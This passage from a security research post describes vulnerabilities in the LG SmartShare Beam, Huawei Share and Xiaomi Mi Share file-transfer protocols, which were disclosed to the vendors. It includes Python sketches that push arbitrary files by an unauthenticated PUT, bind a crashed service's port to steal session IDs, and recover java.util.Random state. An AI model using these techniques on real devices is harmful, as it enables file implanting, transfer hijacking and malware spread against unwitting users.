            <SessionInformation>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;MetaInfo xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xsi:schemaLocation=&quot;urn:wfa:filetransfer&quot;&gt;&lt;Note&gt;1 and 4292012bytes File Transfer&lt;/Note&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;NoofItems&gt;1&lt;/NoofItems&gt;&lt;Item&gt;&lt;Name&gt;CuteCat.jpg&lt;/Name&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;Type&gt;image/jpeg&lt;/Type&gt;&lt;/Item&gt;&lt;/MetaInfo&gt;</SessionInformation>
        </u:CreateSendSession>
    </s:Body>
</s:Envelope>

The SessionInformation node embeds an entity-escaped standard Wi-Fi Alliance schema (urn:wfa:filetransfer), here transmitting a CuteCat.jpg picture. The file name (MetaInfo/Item/Name) is displayed in the file transfer prompt to show the recipient the name of the transmitted file. By design, after the recipient’s confirmation, a CreateSendSessionResponse SOAP response is returned:

HTTP/1.1 200 OK
Date: Sun, 01 Jun 2020 12:00:00 GMT
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 404
SERVER: UPnPServer/1.0 UPnP/1.0 Mobile/1.0

<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSessionResponse xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            ...
        </u:CreateSendSessionResponse>
    </s:Body>
</s:Envelope>

This will contain the TransportInfo destination port that will be used for the final transfer:

PUT /CuteCat.jpeg HTTP/1.1
User-Agent: LGMobile
Content-Length: 4292012
Connection: Keep-Alive
Content-Type: image/jpeg

.... .Exif..MM ...<redacted>

What could go wrong?

Unfortunately this design suffers many issues, such as:

  • A valid session ID isn’t required to finalize the transfer
    Once a CreateSendSessionResponse is issued, no authentication is required to push a file to the opened RX port. Since the DEFAULT_HTTPSERVER_PORT for the receiver is hardcoded to be 55432, any application running on the sender’s or recipient’s device can hijack the transfer and push an arbitrary file to the victim’s storage, just by issuing a valid PUT request. On top of that, the current Session IDs are easily guessable, since they are randomly chosen from a small pool (WfdsUtil.randInt(1, 100));
  • File names and type can be arbitrarily changed by the sender
    Since the transferred file name is never checked to reflect the one initially prompted to the user, it is possible for an attacker to specify a different file name or type from the one initially shown just by changing the PUT request path to an arbitrary value.
  • It is possible to send multiple files at once without user confirmation
    Once the RX port (DEFAULT_HTTPSERVER_PORT) is opened, it is possible for an attacker to send multiple files in a single transaction, without prompting any notification to the recipient.
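Taken together, these flaws mean that "hijacking" a transfer amounts to a single unauthenticated HTTP PUT. The sketch below is hypothetical illustration code (file name and payload are placeholders), showing how any co-located app could push an arbitrary file to an opened RX port:

```python
import http.client

RX_PORT = 55432  # hardcoded DEFAULT_HTTPSERVER_PORT described above


def hijack_push(host: str, filename: str, payload: bytes,
                port: int = RX_PORT) -> int:
    """Push an arbitrary file to an RX port awaiting a transfer.

    No session token is attached: per the design flaw above, none is
    verified once a CreateSendSessionResponse has been issued. The PUT
    path controls the file name written to the victim's storage.
    """
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("PUT", "/" + filename, body=payload, headers={
        "User-Agent": "LGMobile",
        "Content-Type": "application/octet-stream",
    })
    status = conn.getresponse().status
    conn.close()
    return status
```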

Because of the above design issues, any malicious third-party application installed on one of the peers’ devices may interfere with or take over any communication initiated by the legitimate LG SmartShare applications, hijacking file transfers. A wormable malicious application could abuse this insecure design to flood local or remote victims waiting for a file transfer, effectively propagating its malicious APK with no user interaction required. An attacker could also abuse this design to implant arbitrary files or evidence on a victim’s device.

Huawei Share

Huawei Share is another file sharing solution included in Huawei’s EMUI operating system, supporting both Huawei terminals and those of its second brand, Honor.

In Huawei Share, an FTS (FTSService) and an FTC (FTCService) are spawned, listening on ports 8058 and 33003. On a high level, the Share protocol resembles the LG SmartShare Beam mechanism, but without the same design flaws.

Unfortunately, the stumbling block for Huawei Share is the stability of the services: multiple HTTP requests that could respectively crash the FTCService or FTSService were identified. Since the crashes could be triggered by any third-party application installed on the user’s device and because of the UPnP General Event Notification Architecture (GENA) design itself, an attacker can still take over any communication initiated by the legit Huawei Share applications, stealing Session IDs and hijacking file transfers.

Abusing FTS/FTC Crashes

In the replicated attack scenario, Alice and Bob’s devices are connected and paired on a Wi-Fi Direct connection. Bob also unwittingly runs a malicious application with little or no privileges on his device. In this scenario, Bob initiates a file share through Huawei Share. His legit application will therefore send a CreateSession SOAP action through a POST request to Alice’s FTCService to obtain a valid SessionID, which is used as an authorization token for the rest of the transaction. During a standard exchange, after Alice accepts the transfer on her device, a file share event notification (NOTIFY /evetSub) is fired to Bob’s FTSService, which is then used to serve the intended file.

NOTIFY /evetSub HTTP/1.1
Content-Type: text/xml; charset="utf-8"
NT: upnp:event
NTS: upnp:propchange
SID: uuid:e9400170-a170-15bd-802e-165F9431D43F
SEQ: 1
Content-Length: 218
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
    <e:property>
        <SessionID>1924435235</SessionID>
    </e:property>
</e:propertyset>

Since an inherent time span exists between Alice’s manual acceptance of the transfer and its start, the malicious application can perform a request with an ad-hoc payload to trigger a crash of FTSService and subsequently bind its own fake FTSService to the same port. Because of the UPnP event subscription and notification protocol design, the NOTIFY event including the SessionID (1924435235 in the example above) can now be intercepted by the fake FTSService and used by the malicious application to serve arbitrary files.
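The port-takeover step can be sketched as follows. This is hypothetical illustration code: it assumes the legit FTSService has already been crashed, and that the session identifier travels in a SessionID element (an assumption on our part, matching the naming used elsewhere in the protocol):

```python
import re
import socket
from typing import Optional

FTS_PORT = 8058  # Huawei FTSService port mentioned above


def capture_notify_session(port: int = FTS_PORT) -> Optional[str]:
    """Bind the (now free) FTS port, wait for one NOTIFY event and
    extract the session identifier from its XML body."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            data = conn.recv(65536).decode(errors="replace")
            # Acknowledge the event so the legit sender proceeds
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
    match = re.search(r"<SessionID>(\d+)</SessionID>", data)
    return match.group(1) if match else None
```

With the stolen SessionID, the fake FTSService can then serve arbitrary content in place of the intended file.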

The crashes are undetectable both to the device’s user and to the file recipient. Multiple crash vectors using malformed requests were identified, making the service systemically weak and exploitable.

Xiaomi Mi Share

Introduced with MIUI 11, Xiaomi’s MiShare offers AirDrop-like file transfer features between Mi and Redmi phones. Recently this feature was extended to be compatible with devices produced by the “Peer-to-Peer Transmission Alliance” (including vendors with over 400M users such as Xiaomi, OPPO, Vivo, Realme, Meizu).

Due to this transition, MiShare internally features two different sets of APIs:

  • One using bare HTTP requests, with many RESTful routes
  • One using mainly WebSocket Secure (WSS) and only a handful of HTTPS requests

The WebSocket-based API is currently used by default for transfers between Xiaomi devices, and it is the one we assessed. As in other P2P solutions, several minor design and implementation bugs were identified:

  • The JSON-encoded parcel sent via WSS specifying the file properties is trusted and its fileSize parameter is used to check if there is available space on the device left. Since this is the sender’s declared file size, a Denial of Service (DoS) exhausting the remaining space is possible.

  • Session tokens (taskId) are 19 digits long and a weak source of entropy (java.util.Random) is used to generate them.

  • Just like the other presented vendor solutions, any third-party application installed on the user’s device can meddle with MiShare’s exchange. While several DoS payloads crashing MiShare are also available, for this vendor the file transfer service is restarted very quickly, making the window of opportunity for an attack very limited.
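To see why java.util.Random is a poor token source, recall that it is a 48-bit linear congruential generator with publicly documented constants: observing two consecutive 32-bit outputs is enough to brute-force the hidden state and predict every future output. The sketch below reimplements the documented generator; the exact taskId derivation is not public, so this only demonstrates the weakness of the underlying primitive:

```python
# Constants from the java.util.Random documentation: 48-bit state,
# multiplier 0x5DEECE66D, increment 0xB; next(32) is the top 32 bits.
MULT, INC, MASK = 0x5DEECE66D, 0xB, (1 << 48) - 1


def next_state(seed: int) -> int:
    """One step of java.util.Random's LCG."""
    return (seed * MULT + INC) & MASK


def output32(seed: int) -> int:
    """java.util.Random.next(32): the top 32 bits of the 48-bit state."""
    return seed >> 16


def recover_state(v1: int, v2: int) -> int:
    """Given two consecutive 32-bit outputs, brute-force the 16 hidden
    low bits of the state (at most 65536 candidates) and return the
    full internal state after the second output."""
    for low in range(1 << 16):
        candidate = ((v1 << 16) | low) & MASK
        nxt = next_state(candidate)
        if output32(nxt) == v2:
            return nxt
    raise ValueError("no matching state found")
```

Once the state is recovered, every subsequent "random" token the generator will ever emit is known to the attacker.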

On a brighter note, the Mi Share protocol design was hardened using per-session TLS certificates when communicating through WSS and HTTPS, limiting the exploitability of many security issues.


Some of the attacks described can be easily replicated in other existing mobile file transfer solutions. While the core technology has always been there, OEMs still struggle to defend their own P2P sharing flavors. Other common vulnerabilities found in the past include similar improper access control issues, path traversals, XML External Entity (XXE), improper file management, and monkey-in-the-middle (MITM) of the connection.

All vulnerabilities briefly described in this post were responsibly disclosed to the respective OEM security teams between April and June 2020.